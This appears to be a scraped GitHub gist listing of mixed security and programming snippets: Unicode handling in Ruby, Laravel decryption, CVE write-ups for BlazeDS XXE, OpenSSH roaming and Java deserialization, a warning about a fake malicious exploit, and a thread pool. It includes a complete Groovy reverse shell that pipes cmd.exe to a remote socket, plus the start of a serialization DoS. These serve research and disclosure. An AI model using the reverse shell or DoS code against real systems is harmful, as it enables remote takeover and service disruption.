Skip to content

Instantly share code, notes, and snippets.

View k3mlol's full-sized avatar
🙊

k3mlol

🙊
66 followers · 56 following
  • MAMBO-9
View GitHub Profile
@mzsanford
mzsanford / Unicode-normalize-examples.rb
Created July 31, 2009 22:43
Unicode normalization in Ruby sucks
decomposed ="e\xCC\x81"
puts "1: #{decomposed.chars.inspect} // #{decomposed.chars.length}"
puts "2: #{decomposed.chars.normalize(:c).inspect} // #{decomposed.chars.normalize(:c).length}"
puts " 2a: #{decomposed.chars.normalize(:c)[0]}, #{decomposed.chars.normalize(:c)[1]}"
puts " 2b: #{decomposed.chars.normalize(:c).unpack('U*').pack('U')} // #{decomposed.chars.normalize(:c).unpack('U*').pack('U').length}"
puts " 2c: #{decomposed.chars.normalize(:c).unpack('U*').collect{|cp| [cp].pack('U') unless cp.to_s.blank? }} // #{decomposed.chars.normalize(:c).unpack('U*').collect{|cp| [cp].pack('U') unless cp.to_s.blank? }.length}"
puts "3: #{decomposed.chars.normalize(:c).to_s.inspect} // #{decomposed.chars.normalize(:c).to_s.length}"
puts "4: #{decomposed.chars.normalize(:c).to_s.unpack('U'*decomposed.chars.normalize(:c).to_s.length).collect {|x| x.to_s 16}}"
puts "5: #{ActiveSupport::Multibyte::Chars.new(decomposed).length}"
@fideloper
fideloper / crypt.py
Created June 4, 2015 13:52
Decrypt Laravel-encrypted value
import os
import base64
import json
from Crypto.Cipher import AES
from phpserialize import loads
def decrypt(payload):
data = json.loads(base64.b64decode(payload))
@matthiaskaiser
matthiaskaiser / Amf0Input_readObjectValue.java
Last active March 14, 2019 02:23
CVE-2015-3269: Apache Flex BlazeDS XXE Vulnerabilty
/* */ public Object readObject()
/* */ throws ClassNotFoundException, IOException
/* */ {
/* 91 */ int type = in.readByte();
/* */
/* 93 */ Object value = readObjectValue(type);
/* 94 */ return value;
/* */ }
/* */
/* */ protected Object readObjectValue(int type) throws ClassNotFoundException, IOException
@coekie
coekie / SerialDOS.java
Created November 9, 2015 17:41
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;
// billion-laughs-style DoS for java serialization
public class SerialDOS {
@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@troyxmccall
troyxmccall / openssh-vurlnerability.txt
Last active January 29, 2019 15:11
test client bugs CVE-2016-0777 and CVE-2016-0778
#BAD
$ ssh -v -T git@github.com 2>&1 | grep -E "version|Roaming"
debug1: Local version string SSH-2.0-OpenSSH_7.1
debug1: Remote protocol version 2.0, remote software version libssh-0.7.0
debug1: Roaming not allowed by server # <- PROBLEM HERE
#PATCHED
$ ssh -v -T git@github.com 2>&1 | grep -E "version|Roaming"
debug1: Local version string SSH-2.0-OpenSSH_7.1
debug1: Remote protocol version 2.0, remote software version libssh-0.7.0
@alexanderkent
alexanderkent / CVE-2016-0777
Created January 16, 2016 15:53
CVE-2016-0777 roaming openssh exploit
http://pastebin.com/T2zjAdZ5
A quick warning: this fake exploit going around is entirely malicious, and will not exploit the bug, but instead do
bad things to your machine.
If you actually read it, on lines 59 and 60, you'll see this:
(*(void(*)())shellcode)();
exit(1);
This runs the "shellcode" on your own box. Since it requires root to run (because, it says,
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@magician11
magician11 / google-url-shortener.js
Last active September 18, 2023 14:39
How to use Request with the Google URL Shortener API.
const request = require('request');
const GOOGLE_API_KEY = 'your api key'; // from https://console.developers.google.com/apis/credentials
const urlToShorten = 'http://www.thelongurltoshorten.com';
const shortenerUrl = `https://www.googleapis.com/urlshortener/v1/url?key=${GOOGLE_API_KEY}`;
const options = {
uri: shortenerUrl,
json: {
longUrl: urlToShorten
@rosenfeld
rosenfeld / thread-pool.rb
Created June 7, 2016 12:49
Simple thread pool implementation in Ruby
require 'thread' # for Mutex: Ruby doesn't provide out of the box thread-safe arrays
class ThreadPool
def initialize(max_threads = 10)
@pool = SizedQueue.new(max_threads)
max_threads.times{ @pool << 1 }
@mutex = Mutex.new
@running_threads = []
end